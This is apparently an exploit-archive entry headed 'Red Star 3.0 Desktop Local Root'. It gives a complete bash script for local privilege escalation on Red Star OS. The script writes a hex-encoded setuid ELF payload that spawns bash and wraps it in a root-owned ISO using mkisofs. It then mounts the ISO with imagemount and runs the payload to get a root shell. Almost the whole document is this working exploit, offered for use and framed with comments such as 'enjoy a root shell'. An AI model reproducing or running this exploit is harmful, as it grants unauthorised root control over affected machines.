Red Star 3.0 Desktop Local Root



EKU-ID: 4518 CVE: OSVDB-ID:
Author: TheGreatLeader Published: 2015-01-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/bin/bash

# Another local 0day in Red Star 3.0 Desktop by TheGreatLeader
# Run exploit in a X11 terminal and enjoy a root shell...

# Create temp dir for our payload
mkdir /tmp/DPRK

# msfpayload linux/x86/exec PrependSetuid=true CMD=/bin/bash X
echo -e -n "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x88\x00\x00\x00\xbc\x00\x00\x00\x07\x00\x00\x00\x00\x10\x00\x00\x31\xdb\x6a\x17\x58\xcd\x80\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0a\x00\x00\x00\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x00\x57\x53\x89\xe1\xcd\x80" > /tmp/DPRK/TheGreatLeader

# Set the setuid bit
chmod 4755 /tmp/DPRK/TheGreatLeader

# Create ISO and keep permissions, change file owner to root in the iso
/usr/bin/mkisofs --quiet -R --uid 0 -o /tmp/TheGreatLeader.iso /tmp/DPRK

# Delete temp payload
rm -f /tmp/DPRK/TheGreatLeader

# Mount the ISO
imagemount -m /tmp/TheGreatLeader.iso -d /tmp/DPRK
cd /tmp/DPRK

# Enjoy your root shell :)
./TheGreatLeader